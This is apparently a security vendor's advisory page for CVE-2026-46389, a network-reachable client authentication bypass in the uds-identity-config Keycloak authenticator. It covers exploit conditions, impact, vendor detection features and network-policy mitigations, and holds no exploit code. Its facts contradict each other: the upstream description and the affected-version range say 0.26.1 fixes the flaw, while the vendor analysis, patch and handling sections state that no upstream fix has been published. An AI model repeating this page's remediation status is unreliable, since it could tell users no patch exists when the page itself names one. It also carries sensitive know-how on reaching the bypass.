HarborGuardharborguardDatabase
Back to search
CRITICALCVE-2026-46389Published Modified CNA GitHub_M

CVE-2026-46389: UDS Identity Config has a client authentication bypass in `ClientIdAndKubernetesSecretAuthenticator`

UDS Identity Config builds the Keycloak configuration image (realm, plugins, theme, truststore, JARs) consumed by UDS Core's Identity deployment. In versions 0.11.0 through 0.26.0, a logic error in the `client-kubernetes-secret` Keycloak client authenticator (shipped by `uds-identity-config` and consumed by UDS Core) causes the submitted `client_secret` to be overwritten with the mounted Kubernetes secret before comparison. An attacker who can reach the Keycloak token endpoint and knows a `client_id` using this authenticator can authenticate as that client with any `client_secret` value and obtain OAuth2 tokens scoped to the client's service account. In the case of the `uds-operator` client this token can be used to registry/modify other clients. Version 0.26.1 patches the issue.

Metrics

CVSS v3.1
10.0
Severity
CRITICAL
Fixed in
Affected Products
1

Get notified

Email me when this CVE is updated: new fix versions, severity changes, or any record change.

HarborGuard Analysis

Synopsis

An authentication bypass vulnerability exists in the `ClientIdAndKubernetesSecretAuthenticator` component of UDS Identity Config, a package that builds the Keycloak configuration image used by UDS Core. The flaw is reachable over the network with no credentials required, and stems from a logic error that overwrites the submitted client secret with the mounted Kubernetes secret before comparison, effectively accepting any secret value. Successful exploitation lets an attacker obtain OAuth2 tokens scoped to the targeted client's service account, and in the case of the `uds-operator` client, read and modify other registered OAuth2 clients. HarborGuard tracks this advisory and will make a patched-image rebuild available the moment an upstream fix is published.

HarborGuard Coverage

Detection

Detection capability for CVE-2026-46389 is available across every HarborGuard environment; the CVE is ingested from upstream feeds within minutes of publication and matched against customer images in connected registries and CI pipelines, including internally built images layered on top of affected base versions. Any image shipping the affected `uds-identity-config` plugin in versions 0.11.0 through 0.26.0 is flagged automatically.

Available
Triage

HarborGuard surfaces this CVE with its CVSS v3.1 score of 10.0 (Critical) and applies each customer organization's compliance policy weighting to prioritize routing. Findings are directed to the appropriate team inbox within the customer org based on image ownership and environment tagging.

Available
Patch

Because no upstream fix version has been published yet, HarborGuard re-checks the advisory on every ingest cycle and will make a patched-image rebuild available automatically the moment the upstream maintainers ship a corrected release. For customers who opt into auto-remediation, the rebuild, regression test run, and PR against affected workloads will be triggered without requiring manual intervention.

Pending upstream

Exploit Conditions

  • Network reachabilityRequired

    The attacker must be able to reach the Keycloak token endpoint over the network; no foothold on the host is required.

  • AuthenticationNot required

    No credentials are needed prior to exploitation; the vulnerability is the mechanism that would otherwise enforce authentication.

  • Victim interactionNot required

    No user action is required; the attacker sends a crafted token request directly to the service.

  • Attack complexityDetail

    The exploit is reliable and condition-free, requiring only a reachable token endpoint and a known client_id that uses the vulnerable authenticator.

Blast Radius

  • Attacker obtains valid OAuth2 access tokens scoped to any targeted client service account that uses the `client-kubernetes-secret` authenticator.
  • If the `uds-operator` client is targeted, the attacker gains the ability to read and modify other registered OAuth2 clients in the Keycloak realm.
  • Any service account permissions bound to a compromised client token are accessible, which may include downstream API calls, secrets access, or cluster-level operations depending on the deployment.
  • Full confidentiality, integrity, and availability of the identity plane are at risk given the CVSS C:H/I:H/A:H rating and the cross-scope (S:C) propagation.

How HarborGuard Handles This

Available on HarborGuard: because no upstream fix version has been published for CVE-2026-46389 at this time, HarborGuard continuously re-evaluates the advisory on every ingest cycle and will surface a patched-image rebuild the moment defenseunicorns ships a corrected release. In the interim, customers are advised to consider network-policy controls that restrict access to the Keycloak token endpoint to known internal service CIDRs only, reducing the pool of potential attackers who can reach the vulnerable authenticator. Egress filtering at the namespace level can further limit lateral movement if a token is obtained. Where compliance policy permits and auto-remediation is enabled, HarborGuard will automatically trigger a rebuild, run regression tests, and open a PR against affected workloads as soon as an upstream fix is confirmed, with a median time from CVE publication to merged patch PR of around 90 minutes for Critical-severity issues in auto-remediation-enabled environments.

See how HarborGuard automates this
Affected packages
  • defenseunicorns / uds-identity-config
    >= 0.11.0, < 0.26.1
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
References